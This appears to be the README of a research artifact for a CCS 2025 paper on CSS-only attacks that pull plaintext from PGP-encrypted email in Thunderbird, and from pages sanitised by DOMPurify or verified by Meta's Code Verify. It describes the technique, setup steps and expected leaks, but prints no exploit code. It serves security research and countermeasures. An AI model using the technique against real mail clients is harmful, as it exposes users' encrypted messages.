This repository contains the artifact for the paper "Styled to Steal: The Overlooked Attack Surface in Email Clients" published at ACM CCS 2025.
This artifact accompanies "Styled to Steal: The Overlooked Attack Surface in Email Clients" and provides a collection of proof-of-concept implementations demonstrating CSS-based plaintext extraction attacks against encrypted email systems. The artifact contains minimal examples illustrating the core attack technique using container queries, lazy-loaded web-fonts, and contextual font ligatures to map plaintext characters to unique network requests. We include complete case studies targeting Mozilla Thunderbird, DOMPurify sanitization, and Meta's Code Verify system, demonstrating successful plaintext exfiltration from PGP-encrypted emails without JavaScript execution. The artifact provides an evaluation framework for assessing HTML sanitizer libraries and PGP email clients against these scriptless attacks. Through reproducible examples, we show how three benign CSS features can be combined to achieve complete plaintext recovery in a single rendering pass, bypassing state-of-the-art content sanitization mechanisms across multiple browser engines. The provided implementations enable researchers to verify our findings, test additional email clients and sanitization systems, and develop improved countermeasures against CSS-based exfiltration techniques. This artifact demonstrates that existing content isolation mechanisms in email client software are insufficient to prevent encrypted content leakage through CSS-only attack vectors.
The repository is structured into four different directories, each containing a specific part of the artifact:
example: A minimal example demonstrating the core attack technique.casestudies: Complete case studies targeting Thunderbird, DOMPurify and Code Verify.misc: Additional materials, including minimal reproducers and DOMs from vulnerable email clients.study: Evaluation framework for assessing HTML sanitizer libraries and PGP email clients.
More details about the individual directories can be found in their respective
README.md files.
Our artifact requires some recent versions of Python, Node.js, and Docker installations. We have tested the artifact with the following versions:
- Python 3.12.3
- Node.js 23.7.0
- Docker 28.3.3
Additionally, for the Thunderbird experiments, you need:
- Mozilla Thunderbird Version 115.7 (available at: https://archive.mozilla.org/pub/thunderbird/releases/115.7.0/)
- Install Python, Node.js and Docker on your system
- Clone the artifact repository from GitHub and navigate to the root directory of the cloned repository
- Install Mozilla Thunderbird Version 115.7 from: https://archive.mozilla.org/pub/thunderbird/releases/115.7.0/
- Choose the appropriate version for your operating system and locale
- On first launch, configure the following settings:
- Turn off automatic updates: Settings > General > Updates: "Check for updates, but let me choose whether to install them"
- Set up any email account in Thunderbird first
- Import the private key: Settings > Account Settings > End-To-End Encryption > OpenPGP
- The key can be found in the
casestudies/email/directory
- The key can be found in the
- Enable remote content: Settings > Privacy & Security > Mail Content: "Allow remote content in messages"
- For Code Verify experiments, install the modified Code Verify extension:
- Enable developer mode in your Chromium-based browser
- Load the unpacked extension from the
casestudies/accountable/chrome-extension/directory
Before running experiments, verify your setup:
Open casestudies/email/test.eml in Mozilla Thunderbird. You should be able to decrypt the email and read its contents.
Open the developer tools while visiting https://websec.work/noattack.html in your Chromium-based browser and click on the icon of Meta's Code Verify extension in the toolbar. The extension should show a green checkmark, indicating that the page is verified.
Claims: CSS-based attack can extract text from HTML documents. In Mozilla Thunderbird, we can extract PGP-encrypted plaintext from emails with keyword detection, 4-digit PIN recovery, and full-text extraction.
Preparation: Install Mozilla Thunderbird Version 115.7 and import Alice's PGP key as described in casestudies/email/README.md.
Execution: Run the three proof-of-concepts in the casestudies/email/ directory:
- Keyword detection (
keywords/) - PIN recovery (
pin/) - Full-text extraction (
chain/)
Expected Results: Remote connections to local server showing character-by-character plaintext extraction.
Claims: Default configurations of DOMPurify and Firefox's HTML Sanitizer API do not prevent our CSS-based attack.
Preparation & Execution: Follow steps in study/sanitizer/README.md.
Expected Results: Only DOMPurify allows CSS injections via link tags in its default configuration.
Claims: CSS-based attack works against DOMPurify's default configuration.
Execution: Run the server in casestudies/web/ and visit http://localhost:3000.
Expected Results: Character-by-character extraction from HTML document, similar to Thunderbird attack.
Claims: Meta's Code Verify extension only signs JavaScript, not stylesheets, allowing CSS-based attacks to bypass verification.
Preparation: Install the modified Code Verify extension from casestudies/accountable/chrome-extension/.
Execution: Visit https://websec.work/attack.html with the extension installed.
Expected Results: Remote connection leaking PIN (5606) while Code Verify shows green checkmark (verified).
For detailed reproduction steps, see the respective README files:
casestudies/README.md- Complete case studiesstudy/README.md- HTML sanitizer evaluation framework